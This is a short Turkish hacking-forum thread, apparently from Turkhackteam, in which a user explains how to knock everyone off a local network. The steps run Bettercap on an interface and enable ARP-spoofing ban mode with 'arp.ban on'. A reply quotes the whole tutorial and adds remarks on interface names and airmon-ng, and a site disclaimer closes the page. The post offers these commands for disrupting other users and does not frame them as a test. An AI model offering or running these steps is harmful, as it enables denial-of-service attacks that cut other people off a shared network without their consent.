Bettercap İle Ağınızdaki Herkesi Atın...

3 May 2020
109
2
01Adana
Merhaba arkadaşlar Ben Korkusuz Korkak bugün size Bettercap ile ağınızdaki kişileri ağdan atmayı göstereceğim.

öncelikle terminalimizi açıyoruz ve ifconfig yazıyoruz...

Benim interface'im eth0'mış
Sizinki Wlan0'da Olabilir.

o zaman bettercapi interface yazarak çalıştıralım

Komut:

bettercap -iface (interface)

bettercap açıldı şimdi ise ihtiyacımız olan komut;

Komut:
help arp.spoof

Komut:
arp.ban on

bu şekilde ban modunu açıp herkesi ağdan atabiliyoruz.

exemelation

Katılımcı Üye
22 Tem 2009
529
1
Merhaba arkadaşlar Ben Korkusuz Korkak bugün size Bettercap ile ağınızdaki kişileri ağdan atmayı göstereceğim.

öncelikle terminalimizi açıyoruz ve ifconfig yazıyoruz...

Benim interface'im eth0'mış
Sizinki Wlan0'da Olabilir.

o zaman bettercapi interface yazarak çalıştıralım

Komut:

bettercap -iface (interface)

bettercap açıldı şimdi ise ihtiyacımız olan komut;

Komut:
help arp.spoof

Komut:
arp.ban on

bu şekilde ban modunu açıp herkesi ağdan atabiliyoruz.

Güzel konu teşekkürler.
eth0 olmasının nedeni internete ethernet kablosu ile bağlı olmanızdan dolayı ,eğer wlan ile bağlıysanız wlan0 olarak kullanılabilir.

İnterfaceleri airmon-ng ile sanırım görebiliyorduk.
Airmon aracı yoksa indirmek gerebilir.Genelde kali linuxda kurulu oluyor.

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.